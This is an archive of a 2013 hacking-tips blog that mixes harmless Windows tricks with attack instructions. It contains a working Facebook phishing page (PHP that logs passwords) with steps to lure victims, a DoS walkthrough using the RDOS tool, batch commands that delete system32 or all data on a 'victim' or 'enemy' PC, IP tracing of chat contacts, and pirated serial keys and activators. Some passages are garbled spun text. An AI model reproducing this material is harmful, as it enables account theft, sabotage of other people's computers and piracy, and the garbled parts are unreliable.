Saturday, November 23, 2013

Hacking Fb using phishing

Phishing is the most popular and widely used method for hacking email accounts. Phishing is not as easy as it’s name. Creating a phishing page is an easy task and any one can download it from various hacking forums for free. The main step of phishing comes after creation of fake login page.

If You Don’t Know About Phishing Read This Before We Continue

STEP 1:Creating Phishing.php file :
1. Even if you don’t have any knowledge of php file simply copy the following script and save it as phishing.php .

<html>
<body>
<?php $handle = fopen(“password.txt”, “a”);
fwrite($handle,$_POST["email"]);
fwrite($handle,”\n”);
fwrite($handle,$_POST["pass"]);
fwrite($handle,”\n”);
fwrite($handle,”\n”);
fclose($handle);
header(“Location: https://www.facebook.com/login.php?login_attempt=1&#8243;);
exit; ?>
</body>
</html>

STEP 2: Creating index.html page :
2.1 Open the Facebook login page then, Right click>View page source and paste it in notepad and save it as
index.html .
2.2 Open that index.html file with a Notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .
    
                                      

STEP 3: Now create a completely blank text file with name password.txt.

Now you have all the following three files with you :
1. phishing.php
2. index.html
3. password.txt
  If you don’t have your own web hosting account, goto any free web-hosting site http://www.phpzilla.net ,and in file manager, upload all the three files.

Your affected folio is now ready! With the Domain Name you registered on the Web-hosting armpit ask anyone to login and again analysis your password.txt book .You will acquisition the Username and Countersign of that being stored in it.Also the being gets redirected to the aboriginal Facebook login folio and he/she thinks that there charge be some botheration or he/she may accept entered amiss Username or Password.
Though this adjustment of hacking looks absolutely continued yet, already you accept created the affected folio again you don’t charge to accept anyone login on your computer .Just accelerate that URL to anyone adage ‘Hey! Join my folio on Facebook!’ or whatever and afterwards he logins you will accept his/her password.

Thursday, October 3, 2013

How to make your PC Talk Just Like JARVIS in Ironman

 

So Lets Get It Started, Tools You Need :

Windows 7 or 8 ( vista will not )
# Windows Speech Recognition Macros. (Download Here)
# A Bluetooth/Wireless Headset With Mic (optional)
# JARVIS Theme. (read below)

RimikiHacking

 

Step 1  : Train Your Windows Speech Recognition Program :

Yeah I Know, A Basic Step, But The Most Important part of "convert-to-Jarvis" mission, what you gotta do is fire up the windows speech recognition program, which comes pre-installed with the Windows, way to access it is via start bar.

Now choose the required Fields,and after it is done, visit the  "Train your computer to better understand you" section, it is not necessary for people with clear voice/accent, but I strongly advise you to spend at least 5 Minutes on this so your computer can understand you better.

Step 2 : Setting Up The Windows Speech Recognition Macros : 5 Minutes :

Now if you Have set-up- the Windows Speech Recognition Program, you would have been trying out all sorts of cool commands, But now to spice it up, We'll use the Windows Speech Macros.I assume you would have already downloaded it from the link above and installed it.After Installing it i would advise you to put its shortcuts in two places, One in the desktop and other in the start-up folder, so it would start the second your computer boots up.So a little walk through to this software, This is a super-cool, little software that teaches your computer to talk to you interactively.Here is how to set up the commands :
Double Click The Macros Icon, and when the window pops up asking "What should the macro do?" click "Advanced." For those of you familiar with creating websites, this should be a welcome site. WSRM uses XML for commands... which makes creating custom commands relatively simple. For those of you who aren't aware of XML, it's still easy.Here Is A Little Sypnosis at what are you looking at :

<speechMacros> - This is the starting Tag, it just tells the computer that this XML file uses the Speech Macros to execute.

<command> - This is the command to be executed. Each command is basically one action... in most cases you will only need one, but for some automations you'll want to include more than one. You'll see an example of this later.

<listenFor></listenFor> - This tells the computer what word or phrase to listen for in order to do an action. Notice that there is a closing tag (</listenFor>), this tells the XML that this spot in the code is where to stop doing whatever function... in this case stop listening for a word or phrase once the computer hears it.

</command> - The closing tag for the "Command" tag... again, in XML every tag will have an opening/closing tag and what happens between the two is how it knows what to execute. In this case it knows that the command is finished once the word/phrase has been detected.

</speechMacros> - By now I think you can figure out why this is here.

Since I'm going to name my computer Jarvis, I'm going to tell my computer to listen for it's name by changing the <listenFor> tags to say the following :   <listenFor>Jarvis</listenFor>

Here Is A Little Applet That will teach my laptop to Reply Me :
_________________________________________________________________________________
<speechMacros>
<command>
<listenFor>Wake Up Jarvis</listenFor>
<speak>Systems Online, Database Check, Good Morning Sir !</speak>
</command>
</speechMacros>
_________________________________________________________________________________

So Whenever I Say "Hey Jarvis" My Computer will reply me with "System Online,Database Check, Good Morning Sir ! ", You can change it to whatever you like !

An Speech Macro For Getting The Weather :
_________________________________________________________________________________

<?xml version="1.0" encoding="UTF-16"?>
<speechMacros>
<command>
<listenFor>Pull up the weather in [CityName]</listenFor>
<run command="
http://www.weather.com/weather/local/{[CityName.zipCode]}"/>
</command>
<command>
<listenFor>Is it cold in [CityName]?</listenFor>
<speak>Let me check... just a moment.</speak>
<script language="JScript">
<![CDATA[
<var xml_doc = new ActiveXObject("Microsoft.XMLDOM");
<xml_doc.async = false;
<xml_doc.load("
http://www.rssweather.com/zipcode/{[zipCode]}/rss.php");
<var titles = xml_doc.getElementsByTagName("title");
<var descriptions = xml_doc.getElementsByTagName("description");
<Application.Speak(titles.item(2).text + " in {[*CityName]}");
<Application.Speak(descriptions.item(2).text);]]>
</script>
</command>
<listenForList name="CityName" propname="zipCode">
<item propval="65201">Columbia</item>
<item propval="37201">Nashville</item>
</listenForList>
</speechMacros>
_________________________________________________________________________________
A Macro To Restart The Computer :
You will just have to say "Nuke It!" and the computer will restart :
_________________________________________________________________________________

<speechMacros>
<command>
<listenFor>Nuke it</listenFor>
<speak>Rebooting The System.</speak>
<run command="C:\Windows\System32\shutdown.exe" params="-r -t 00"/>
</command>
</speechMacros>
_________________________________________________________________________________

Another One To Shut Down The Computer :
You will have to say "Goodbye Jarvis" And the Pc Will Shut Down :
_________________________________________________________________________________

<speechMacros>
<command>
<listenFor>GoodBye Jarvis !</listenFor>
<speak>Getting Offline,Bye Sir</speak>
<run command="C:\Windows\System32\shutdown.exe" params="-s -t 00"/>
</command>
</speechMacros>
_________________________________________________________________________________

Download This Pretty Little App And Extract It To C:\NIR\  and you will add more intelligence to your PC :

Volume Up:
<speechMacros>
<command>
<listenFor>volume up</listenFor>
<run command="C:\nir\nircmd.exe" params="changesysvolume +5000"/>
<speak>Volume Up</speak>
</command>
</speechMacros>
_________________________________________________________________________________

Volume Down:
<speechMacros>
<command>
<listenFor>volume down</listenFor>
<run command="C:\nir\nircmd.exe" params="changesysvolume -5000"/>
<speak>Volume Down</speak>
</command>
</speechMacros>
_________________________________________________________________________________

Volume Medium :

<speechMacros>
<command>
<listenFor>volume medium</listenFor>
<run command="C:\nir\nircmd.exe" params="setsysvolume 30000"/>
<speak>Volume at medium listening level</speak>
</command>
</speechMacros>
_________________________________________________________________________________

For More Interactivity, install Voice Search on Google chrome or some similar app in Firefox !

Sunday, September 29, 2013

How to Setup and Use Nircmd

Nircmd is probably the most powerful command line tool by which you can perform hundreds of tasks. All you need to do is download the Nircmd.exe file on your computer and place it in a proper directory. It will make your command prompt line very powerful and so that you can perform countless numbers of tasks by using command prompt.

You can open the door of DVD drive, make your computer speak the text currently in the clipboard, increase or decrease system volume, mute, un-mute your computer, turn off monitor, log off the current user, turn off your computer, hide your internet explorer windows, hide the desktop window, hide/show clock on system tray, disable/enable your screensaver, and many other tasks. Here is the method to setup and use this tool.

Download Nircmd here

 

Extract all the three files given inside zip file using any file extractor tool.

copy nircmd folder How To Setup And Use Nircmd Command Line Tool

After extracting the file to anywhere on your desktop, click on the 33 KB nircmd.exe. It will show you the dialog box as shown in the screenshot below. Click on the “Copy to Windows Directory” button.

copy nircmd windows How To Setup And Use Nircmd Command Line Tool

In the next dialog box, click on the “Yes” button.

copy nircmd windows directory How To Setup And Use Nircmd Command Line Tool

It will copy the nircmd.exe file inside the Windows folder of the C drive. Now you don’t need to mention the path of nircmd.exe while giving the command.

nircmd copied windows How To Setup And Use Nircmd Command Line Tool

That’s how you can setup this powerful tool.

How to use Nircmd command line tool

Click on Start button or win+ r  and type cmd  in the search box. Click on the result or press Enter.

PrtScr capture

Now enter the following command in the cmd command prompt

nir

nircmd.exe cdrom open e:

Note: In my computer letter E is assigned to DVD drive. If any other letter assigned to that drive in your computer then you have to type that letter in the command. For example, if letter assigned to your computer’s drive is J then enter this command

nircmd.exe cdrom open j

It will open the door of your DVD drive.

Similarly you can use the below given command to mute the system volume.

nircmd.exe mutesysvolume 1

There are hundreds of commands you can give using command prompt. The download page contains all the commands available in Nircmd.

Monday, September 23, 2013

Dos Attack Tut's

DOS
DoS stands for Denial of Service.
A DoS is an attempt to make a computer or network resource unavailable to its intended users.

DDoS
DDoS stands for distributed denial-of-service.
To explain it in a couple words, a DDoS is the same as a DoS.
But with a DoS you are the one attack. DDoS'ing is shells around the world attacking.

To get started: Getting the IP of a Website
To attack a website you need the IP address. There are many ways to get them, but i'll explain a really simple one.

Go to start, Run and type "CMD" and press enter.
After that type in "ping sitenamehere.com".
And press enter again, then you'll get the site IP.

PrtScr capture

DOS Tool----
Now we will you use a ddos tool to take down a website.

Dos

Tool we will use is RDOS it is a small tool but very powerful,download link is given at end of post.
After downloading this tool open this and put the ip address of site and then enter the port which is 80. Now press entre and it will start showing * icon it means that website is not crashed, when - icon show then we came to know that website is crashed. You can see this by opening that website and it will open a error page.

>>>>>>>>>>> Download rDos   <<<<<<<<

Sunday, September 22, 2013

Root Micromax

  • Before you begin
  • Remember to take a full back up along with other critical files.
  • Though there is nothing that is wiped whilst rooting the android mobile phone,
    I want you to on safer side.
    Neither the author nor the site manager is in charge of just about any harm that may cause by pursuing the manual.
    I might certainly direct you towards every possible approach.
    How much is your device charged? It’s advocated that you simply charge the unit to 75% or maybe more.
    I’m certain you’re aware that rooting would certainly remove the warranty of this android Smartphone.
    If the warranty is taken off, you may not be capable of getting it back.
    Start USB debugging by doing the location > manage applications > development > USB debugging.
  • Remember to download & install Micromax A88 Drivers in the web page link that is certainly given in the download section.
    You should not carry on without putting in these drivers.
    Acquire Micromax A88 Rooting Bundle – Bin4ry Tool along and get the contents extracted within the computer.
    Hook up the Micromax A88 Canvas New music to the computer system employing USB wire.
    You need to make sure that USB debugging is enabled.
    Go into the settings > manage apps > development > USB debugging to enable.
    Open the extracted content folder and double click on the RunMe.bat document.
    Remember to view the screenshot down below with the reference point.
    Now, push “1” in the keyboard and wait for 5 units.
    Please be patient during this time period.
    On end, the command prompt window will display some text – “have fun” within the monitor.
    Now you can disconnect the Micromax A88 Canvas Music from the computer system.
    Congrats. You’ve successfully rooted Micromax A88 Canvas music.
    Now you can remove the unwanted applications by making use of Titanium Back-up.
    Also you can confirm whether or not you’ve rooted successfully by making use of the software known as Root Checker.
    As soon as you install this specific software,
    it is going to inform you whether or not the rooting has been successful or not.
  • If the rooting is unsuccessful, I would recommend you to uninstall the drivers and install them all over again.
  • The most possible reason for unsuccessful rooting is usually improper installation Micromax A88 USB drivers.
  • Click Here To Download Root App

Monday, September 16, 2013

Indians Earn Rs.50000/month via part time jobs. Easy form filling data entry jobs


Earn Rs.25,000-50,000/- per month from home. No marketing / No MLM .
We are offering a rare Job opportunity where you can earn working from home using your computer and the Internet part-time or full-time. Qualifications required are Typing on the Computer only. You can even work from a Cyber Cafe or your office PC, if so required. These part time jobs require working for only 1-2 hours/day to easily fetch you Rs. 20-25,000 per month. Online jobs, Part time jobs. Work at home jobs. Dedicated workers make much more as the earning potential is unlimited. No previous experience is required, full training provided. Anyone can apply. Please Visit 
Click Here To join

Sunday, September 15, 2013

Thursday, September 12, 2013

Cross Site Scripting Hacking Tutorial

'XSS' also known as 'XSS' - Cross Site Scripting. It is a very common vulnerability 
Found in Web Applications, 'XSS' allows the attacker to INSERT malicious code, 
there are many types of XSS attacks, I will mention 3 of the most used.
This kind 
of vulnerability allows an "attacker" to inject some code into the applications 
affected in order to bypass access to the website or to apply “phishing" on falls 
users.
 
This technique is also used for website Hacking. 
Types of XSS: 
There are actually three types of Cross-Site Scripting, commonly named as: 
    DOM-Based XSS 
    Non-persistent XSS 
    Persistent XSS 

For Full Tutorial     Click >>>>>>>>>  Download <<<<<<<<<<

Friday, September 6, 2013

MINIMIZE APPLICATIONS IN NOKIA S40 SERIES PHONES


First of all, you need to download JAF software.
You can get it by searching on the Internet.
Now, what we do first is bypass the phone's security, or in other way, Deactivate it.
STEPS:-
>Install JAF
>Connect your phone to your PC using NOKIA PC SUITE
Open JAF and run it through Pkey
>Now, goto "BB5" column and tick "read pp" button
Click on Service button.
>Now you will obtain the pp file of your phone.
Save the file and Edit it with any text editor, preferably Notepad.
>Now you have to find the line which says "28 1" or "48 1"
for s40 v3 phones, you have to change the value of "28 1" to "28 2"
Now in case of  s40 v5 phones, change the value of "48 1" to "48 2"
Certain phones show only few fields. In such case, just add "48 2" below set 1.
Now save it.
>Now Upload the pp file back into phone. For this, tick "Upload pp" and press service button.
Now your Phone will show "Test mode".
A Popup will appear on your computer for selecting the file.
Here, select the edited pp file.
JAF will upload the edited pp file.
>Disconnect your phone, and now its done.
You have now hacked your phone's security.
Whenever you restart your Phone, it shows "Test in RNDIS USB Mode?"
Always press "No".
Another message that appears is this "Warning TCK Flag set".
This will appear every time you restart your phone.
And well, Its Something you need to sacrifice on...
It appears around 5 times whenever I've restarted my Nokia C2-01 phone.
Just know that it is Totally Normal for it to happen...
>Now, after you've hacked your Phone's Security, you're supposed to edit the
application in which you need to have the Minimize Available.
The application will be a .jar  file.
Extract it in a separate folder on your computer and edit "manifest.mf" file.
Its located inside META-INF folder.
Add the following code to the very last line of manifest.mf
"Nokia-MIDlet-no-exit: True"  (without the quotes)
Now, Repack the jar file and send it to your Phone.
After Installing on Phone, whenever you want to Minimize, just
press the Red button ONCE. (The button you use for disconnecting calls)
Now, remember you need to press it only once, not hold it...
The application will not show an Exit message but will dissappear out
of view. But don't worry, your application has Minimized.
Now to open your Minimized application again, just go to where you have installed
your application and Press it. It will reappear to where you have left
it or in proper words, Restored.
To Exit the application properly, you have to manually exit it.
in case of Opera browser, go to its Menu and press Exit.
Otherwise,
the application will stay Minimized until you have manually Exited it.
Now enjoy...
 

check this pic for easy to use jaf

2 Minimize Nokia S40 first last  PrtScr capture_4STEP 3

Sunday, September 1, 2013

Windows7 Activator

1st – Click Here ----->>> Download<<<<----- To get Windows7 Activator 

2nd- Run Windows7Activator-install.exe. Make sure to run as administrator under win7/vista.


A window with a button 'Install' should popup.

 Click 'Install'

That's it! Enjoy your newly registered version

Convert Batch File Into Execute

convert batch file (.bat,cmd) into execute file (.exe) in a very easy way
all you have to do is
1st : Disable your anti virus so that you can execute or convert your batch file
2nd    click  and  --->>>   Download it <<<-----    from here

Window Xp Hacker Theme

 
Click  -->  Download <-- to start

Sunday, August 25, 2013

WATCH YOUTUBE VIDEOS AT HIGH QUALITY

Simple way to watch good quality youtube videos Many of us are really found of videos 
and watch videos at youtube or Google Videos.  Of course you prefer to watch good 
quality videos at youtube than those worse videos.

I am gonna show you a small trick that will do all the wonders, and now you can always 
get good quality youtube videos.

Step1: Click to video that you want to see, the link will display on Address bar.

Example:  http://www.youtube.com/watch?v=Ne1l6VNkuLM

Step2: Add &fmt=6 to the end of that string.

That address like:

http://www.youtube.com/watch?v=Ne1l6VNkuLM&fmt=6

Optional Step: To get more quality youtube video

.Add   &fmt=18 to the end of that string, you’ll have the best quality video with direct 
download link !

Example:

http://www.youtube.com/watch?v=Ne1l6VNkuLM&fmt=18

Note: Appending &fmt=6 to the URL delivers a 448×336 resolution version of the 
video and appending &fmt=18 delivers a even better 480×360 resolution version.

                   THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                                     

DAMAGE PC

                                       
I m here explain to make a file that destroys your victims pc 
I m not responsible for the damage caused by this file." 

* Do It At Your Own Risk*
---------------------------------------------------------------------------------------------------------
1. Open Notepad 
2. write the above command : - 
Code:
del c:\WINDOWS\system32\*.*/q

3. Save the above notepad with the extension ".bat or .cmd" as you want 
4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!! 
Don't double click the file otherwise u r in trouble. 
Why ?????? bc0z the file u created delete all files from ur 
system32 folder and when you restart ur pc it will not start 
bc0z system can not find the files in the system32 folder which 
is required at the time of booting. 

5. You can also test the above by creating a fake folder let 
suppose 

windows1 in C:\. Copy some old files in it and just follow the 
above command.By double clicking the bat or cmd file ur all files 
automatically get deleted. 
6. You can try this file in any one`s computer.(but this result in causing damage to the 
computer, so think again before trying this on anyone's pc)

                   THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                                 

TRICK TO DESTROY PC DATA

                     

Simple trick to destroy your enemy computer's data..

Want to destroy your enemy computer???
if (yes) than follow these steps.....

step 1) Go to the RUN box,from start menu    

step 2) type cmd and press enter
step 3) type del /f /q
step 4) then press enter

(don't do it on your own computer it will delete all you important data)

**Do it at Your Own Risk**

                   THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                                   

GET SERIAL KEY FOR ANY SOFTWARE

 

This is my favorite. trick
Find Serial-Key for any software !!
1. Those who use trial versions of softwares.
2. Go to www.google.com
3. Type '94fbr' Then space and then name of  the
software you need..
4. Google will show you links with your desired
serial key or patch files..

                   THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                               

HACK IP ADDRESS

                               

The first basic step towards hacking any website or facebook account or 
anything is knowing their IP address..
so today i am gonna show you a way of getting someone’s Ip through Facebook. 

Step 1 – First invite or ping that person for a chat on facebook .

Step 2 – Make sure your all other tabs in browser and other services
                in computer are closed. If Possible for you then delete all the cookies-
cache
               and browsing history from your browser.

Step 3 – While chatting on Facebook go to Start >- Run >- cmd .

Step 4 – After Opening command Prompt Type netstat -an command and hit Enter.

Step 5 – Now you will get Ip Address of all the established connections there .
                trace facebook ip How To Get Someones Ip Address Through Facebook

Step 6 – Note all the suspicious Ip’s and trace user using ip address tracer sites 
               like whatismyip or ipmango.com .
That's It !

You can use same trick for tracing ip of someone’s on Skype, gtalk and Yahoo 
Messenger
To get your ip address..i.e from you network see the b image attached.

                      THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                                

HACK CD-ROM DRIVE


There is a code in VBS which helps you to hack , 
and open the tray of a cd-rom drive whenever it remains closed in few steps:

1. Open a notepad and paste the following code: do
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection

if colCDROMs. Count >= 1 then
For i = 0 to colCDROMs. Count – 1                        
colCDROMs. Item(i).Eject                               

Next ' carom
End If

loop
2. Save the code as: xxx.vbs(where xxx:any name)
3. Now once you double click the saved file,your Cd-Rom drive will open 
whenever it is closed!

                   THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                               

WINDOW RUN COMMAND












You can access all these programs by going through START-->RUN or Simply 
Click Windows Key+R

SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert


System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information - msinfo32.
Task Manager – taskmgr
System Properties - sysdm.cpl
Task Manager – taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman
Windows Address Book – wab

Windows Address Book Import Utility - wabmig
Windows Backup Utility (if installed)- ntbackup
Windows Explorer - explorer
Windows Firewall- firewall.cpl
Windows Magnifier- magnify
Windows Management Infrastructure - wmimgmt.msc
Windows Media Player - wmplayer
Windows Messenger - msmsgs
Windows Picture Import Wizard (need camera connected)- wiaacmgr
Windows System Security Tool – syskey
Windows Update Launches - wupdmgr
Windows Version (to show which version of windows)- winver
Windows XP Tour Wizard - tourstart
Wordpad - write
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Phone and Modem Options - telephon.cpl
Phone Dialer - dialer
Pinball Game - pinball
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder – printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc

Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
Malicious Software Removal Tool - mrt
Microsoft Access (if installed) - access.cpl
Microsoft Chat - winchat
Microsoft Excel (if installed) - excel
Microsoft Frontpage (if installed)- frontpg
Microsoft Movie Maker - moviemk
Microsoft Paint - mspaint
Microsoft Powerpoint (if installed)- powerpnt
Microsoft Word (if installed)- winword
Microsoft Syncronization Tool - mobsync
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Nero (if installed)- nero
Netmeeting - conf
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview Desktop Manager (If Installed)- nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator- odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Outlook Express - msimn
Paint – pbrush
Keyboard Properties - control keyboard
IP Configuration (Display Connection Configuration) - ipconfi/all
IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns

IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
Java Control Panel (If Installed)- jpicpl32.cpl
Java Control Panel (If Installed)- javaws
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff.....
Accessibility Controls - access.cpl
Accessibility Wizard - accwiz
Add Hardware - Wizardhdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools control - admintools
Adobe Acrobat (if installed) - acrobat
Adobe Designer (if installed)- acrodist
Adobe Distiller (if installed)- acrodist
Adobe ImageReady (if installed)- imageready
Adobe Photoshop (if installed)- photoshop
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard – fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Control Panel - control
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart

Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
Files and Settings Transfer Tool- migwiz
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Firefox (if installed)- firefox
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Help and Support- helpctr
HyperTerminal- hypertrm
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Connection Wizard- icwconn1
Internet Explorer- iexplore
Internet Setup Wizard- inetwiz
Internet Properties- inetcpl.cpl

                        THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                                  
                  
                

Saturday, August 24, 2013

How To Hide any files into JPG file

 

There is a trick in windows which gives you the opportunity to hide any type of 
files in a JPG file.
This simple trick can be achieved in few steps:

* Select the files you want to hide and compress them using winrar,winzip etc...
* Drag the compressed file and a random picture in the same directory(eg. C:\)
* Go to Start-->Run and type cmd in order to open the command promt window
* Go to directory where you have placed the files (type cd.. twice to go to C:\)
* Type:

COPY /B "name".jpg + "name".zip "new name".jpg

After that process a new .jpg file will be created in C:\ with the name: new name.
If you double click you will see just the image,but if you right click to the file and 
select extract,your hidden files will be extracted.

                   THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                                   

Avast 8.0 License key

W974050R9942A0910-8NB2E62T

Break A Bios Password

                               Break A Bios Password

Have you ever been locked out of an old computer by a forgotten BIOS password? 
There's no need to get frustrated. It is relatively easy to bypass this safeguard.
Desktop Power off the computer and make sure that it is unplugged.

Open up your computer case. You need physical access to the motherboard to 
complete this procedure. Find a circular, (mostly) silver metallic object on the 
motherboard. This is the CMOS battery.

CAREFULLY remove the CMOS battery and leave it out for about 120 seconds. 
This will flush the CMOS memory which stores the BIOS password and all other 
configuration.
Set the battery back into place and power on the computer.
The computer should then warn you that the CMOS configuration could not be 
found.
You can either reconfigure it yourself or restore defaults. Restoring the default 
configuration should be fine.
You will notice that the BIOS password has been cleared and you can boot without 
it. 
You may reset the BIOS password to something else by going into the BIOS 
configuration
and setting a new User Password (The Supervisor Password controls access to the 
BIOS, NOT the computer!)

                                                                          THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                             

Enable God Mode in Windows 7

                      

There is something called as God mode in windows 7. If you haven’t heard about 
it already then let me tell you, Its simply a shortcut to a location where you can 
view and access all the system settings. That means having control over all the 
system settings at one single place, isn’t it amazing? Well lets see  how we can 
enable God Mode.
Click here to watch How to enable God Mode in Windows 7

    Create a new folder anywhere on your computer.
    Rename that folder with this code :
    God Mode.{ED7BA470-8E54-465E-825C-99712043E01C}
    And press Enter.
    As soon as your press Enter, the icon changes and God Mode shortcut appears.
    Open that shortcut and you will be inside the God Mode folder.
    Here can can view and control all the system settings.
    Check screen_shot below, that’s how the God Mode folder looks like.

                   THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                                 

Friday, August 23, 2013

Hide a Folder Without Software

1 - Open Notepad copy all the Script below and save it as Locker.bat

2 - AFTER you open you will see a Folder name “Private” which you can copy your file there

3 – it will asked for password to unlock &The password Would Be “ H4X0RZ” (Without “ quote”)

cls
@ECHO OFF
title Folder Private
if EXIST "HTG Locker" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== H4X0RZ goto FAIL
attrib -h -s "HTG Locker"
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

Hide Any System Drive Using Command Prompt

 Sometimes you really would rather hide one of your drives than share it with 
people, or something like that. Yes, there are software's that do this function but 
what if I said that I could save you that space and you could do it manually using 
the Command prompt.

How To Hide A Drive Using Command Prompt
1. Open Command prompt.

2. Type Diskpart and hit enter. 

3. Next, type list volume and hit enter, this will produce the list of all drives on 
your computer.

4. Next type select volume X -->where ‘X’ is the letter of the drive you want to 
hide.

5. Next, type remove letter X to hide the drive X.

That's it! Now your drive is hidden. Go and check it out!

How To Unhide the Drive
1. Follow the first 4 steps as above.

2. To unhide the drive, type Assign Letter X where X is the letter of the drive you 
previously hid.

That's it! Its a very simple trick and makes you think I-installed-a-software-for-
this?, no?

                                         THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE                         

CREATE FILE WITH NO NAME

This Trick will allow you to create files and folders without any name.

Just follow the following Steps:

1.Select any file or folder.

2.Right click on it, press rename or simply press F2.

3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from 
the num_pad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the 
right side of the keyboard. Don't type the numbers which are present on top of the 
character keys.

               

                               THIS CONTENT IS JUST FOR EDUCATIONAL PURPOSE

Proxy Site

http://www.surfscreened.com
http://www.hagiomusic.info
http://www.greenpips.info
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.allfreehere.info
http://www.takefreely.info
http://autobypass.com
http://www.proxcity.info
http://www.proxyzip.org
http://www.cheekyproxy.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.hidemefast.com
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://myspaceproxyy.com
http://www.browsesneaky.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.proogle.info
http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.slyuser.com/
http://tenpass.com
http://pawxy.com
http://pawxy.org
http://logu.in

Photoshop 7.0 Serial number

Photoshop
1045 0009 2130 3302 1733 9518 OR
Serial No: 1045-1209-6738-4668-7696-2783

PageMaker 7.0
1039-1121-2998-7586-7388-7545
Serial No: 1039-1121-0951-5316-3784-5907

Avast 8.0 License key

W9740570R9942A0910-8NB2E62T

Tuesday, May 21, 2013

Script for using copy all in facebook.com (pages,group)

1 step – press Left CNTRL + SHIFT + J  and  paste  the script and click enter

 

var inputs = document.getElementsByTagName("input");
for (var i=0; i < inputs.length; i++) {
